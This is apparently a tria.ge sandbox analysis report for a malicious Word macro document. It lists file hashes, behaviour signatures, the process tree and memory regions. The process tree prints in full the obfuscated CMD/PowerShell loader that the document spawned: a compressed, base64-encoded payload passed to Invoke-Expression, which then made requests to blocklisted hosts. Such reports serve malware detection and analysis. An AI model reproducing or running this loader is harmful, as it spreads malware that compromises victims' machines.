Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    28/05/2024, 23:32

General

  • Target

    7ec769008580eb7db187b9a46643629a_JaffaCakes118.doc

  • Size

    80KB

  • MD5

    7ec769008580eb7db187b9a46643629a

  • SHA1

    2d6be3a810c9797d1943551cf17b8d3e5d21e053

  • SHA256

    01e850c472afd03b8855f4b8a44715df7fd402284a620e89056ace9ccaf89317

  • SHA512

    acd61402470a948837f91596f1db1ab74213c2e8d114244b1008d6ec3fd11f578a4b04c5cc65beff404f70c7000c4e8e774305334b3f67c6f024e429d8690ca0

  • SSDEEP

    768:gI6NVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9FVorXUomQwEHcwRZ:gFNocn1kp59gxBK85fBt+a9OXUDd

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7ec769008580eb7db187b9a46643629a_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1724
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3032
      • C:\Windows\SysWOW64\CMD.exe
        CMD C:\windowS\sYsTeM32\cmd /C "SEt dlV=(("{93}{86}{31}{95}{45}{77}{35}{43}{58}{30}{28}{74}{68}{42}{26}{70}{57}{23}{78}{34}{32}{17}{129}{52}{116}{71}{73}{16}{99}{127}{115}{6}{137}{134}{108}{83}{88}{106}{90}{19}{29}{96}{66}{110}{11}{51}{38}{25}{10}{107}{111}{56}{105}{67}{97}{109}{113}{33}{128}{130}{69}{133}{55}{48}{91}{72}{102}{101}{104}{112}{61}{9}{49}{124}{89}{39}{123}{46}{15}{76}{18}{44}{121}{20}{3}{79}{75}{8}{7}{92}{126}{117}{22}{120}{119}{135}{84}{87}{50}{65}{82}{53}{81}{136}{54}{37}{122}{132}{41}{2}{27}{14}{60}{24}{62}{114}{100}{59}{85}{131}{63}{0}{21}{13}{103}{118}{98}{5}{64}{94}{36}{47}{125}{40}{12}{4}{80}{1}" -f'D()3rZ',')','b','JK','N6qs','NVe','vPyv','6','g5Ko','PSF','HaCX','OY','s-JoI','( ','E','n7c','ON','Si8C','ZL','ZQvjca','wlQUtncGsi',' .','s','NG(','t','vB','mbaSE64','j','MoRY','L','iO.mE','ompre','wFIb/','/9','Bda8I','rEA','FEREnce','rZF','1jUatjsw7Pp','e','x6q','w-O','veRt]::fRo','M(','3','EFLa','l7Q/11I/A',')[','nyhD','f5','resS','gzz7eIW1LZ','DDYHhoL7','reSsiOnMODe','OmpReSs)3','k','eW2S+','TRI',' [','nCodinG]::AS','c','qd8yBV',' sYSTeM.io.streaM','aDtoeN','rbOsEpR','iO','YMp5ZyWCitO','cqQvd','M][coN','m9AF','s','FMuZABrtJ','NB9m','0y','StREA','Ro8R','ME2Tl','tESt','6qsNZ','rxtR','6qs',']::DE','n.COMP','yDwm','o.','Cii','O.C','cOmP','QN','ibTL','L','49Pl','ssw/AM=6qs',' ( nEw-ObjEct i','E','sSIoN.d','Apiep/TGrGdcx5C','1CZnu20Geu6','BU','qUmJp41T','AdER( BUN_,[Text.e','HQTu','WfE7D9HO','([S','k','4+fT+u1zdWcHd1Qu9NGP','y','yr','UbiFkrt','Sjd','BlZ6HNlP','R','vnY58ShmcgI','d3XkmFdMV','rE','4dz','QOi',',[sy','TRiNG]','em.','t','cA185CM','orE','m','32','1,3]+6qs',')','+t+Xit','4s','sbgm','VzvKNm0s',')} ).Re','ACh { nE','TQUpg','Xn9','I','C','JxD')).rePlace('BUN',[sTRing][cHAr]36).rePlace(([cHAr]54+[cHAr]113+[cHAr]115),[sTRing][cHAr]39).rePlace(([cHAr]51+[cHAr]114+[cHAr]90),[sTRing][cHAr]124)^| . ( $PSHOME[4]+$pshOme[30]+'x')&& POWerSHelL ${eXECUTIONCoNtEXT}.\"iNvo`k`eCOmM`AND\".( \"{1}{2}{0}\" -f'IpT','InV','OKeSCR').Invoke( (.( 'LS') ( \"{0}{1}\" -f 'eNV:','DLV' ) ).\"vA`lUe\" )"
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2660
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          POWerSHelL ${eXECUTIONCoNtEXT}.\"iNvo`k`eCOmM`AND\".( \"{1}{2}{0}\" -f'IpT','InV','OKeSCR').Invoke( (.( 'LS') ( \"{0}{1}\" -f 'eNV:','DLV' ) ).\"vA`lUe\" )
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2880

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      f40a71bb3e3507c5351630c4ae1530f6

      SHA1

      3750d42d8c54f616acc19f93b356c4609dab8772

      SHA256

      0f5efdf928fce117daf8abf7b6230eccadd60c87fde0c3b36ad1c508918a0110

      SHA512

      c9920ac756deba6242c1ddce51865edc4e46bcfc6a575b1b121221592e37e8d5345ebd955a6cd6e99c99084d8bd9cd6f5f7fbbcb164c0f17d993fe16740bac41

    • memory/1724-12-0x00000000005E0000-0x00000000006E0000-memory.dmp

      Filesize

      1024KB

    • memory/1724-8-0x00000000005E0000-0x00000000006E0000-memory.dmp

      Filesize

      1024KB

    • memory/1724-7-0x00000000005E0000-0x00000000006E0000-memory.dmp

      Filesize

      1024KB

    • memory/1724-11-0x00000000005E0000-0x00000000006E0000-memory.dmp

      Filesize

      1024KB

    • memory/1724-10-0x00000000005E0000-0x00000000006E0000-memory.dmp

      Filesize

      1024KB

    • memory/1724-0-0x000000002FC21000-0x000000002FC22000-memory.dmp

      Filesize

      4KB

    • memory/1724-9-0x00000000005E0000-0x00000000006E0000-memory.dmp

      Filesize

      1024KB

    • memory/1724-2-0x000000007150D000-0x0000000071518000-memory.dmp

      Filesize

      44KB

    • memory/1724-6-0x00000000005E0000-0x00000000006E0000-memory.dmp

      Filesize

      1024KB

    • memory/1724-20-0x000000007150D000-0x0000000071518000-memory.dmp

      Filesize

      44KB

    • memory/1724-21-0x00000000005E0000-0x00000000006E0000-memory.dmp

      Filesize

      1024KB

    • memory/1724-36-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1724-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1724-37-0x000000007150D000-0x0000000071518000-memory.dmp

      Filesize

      44KB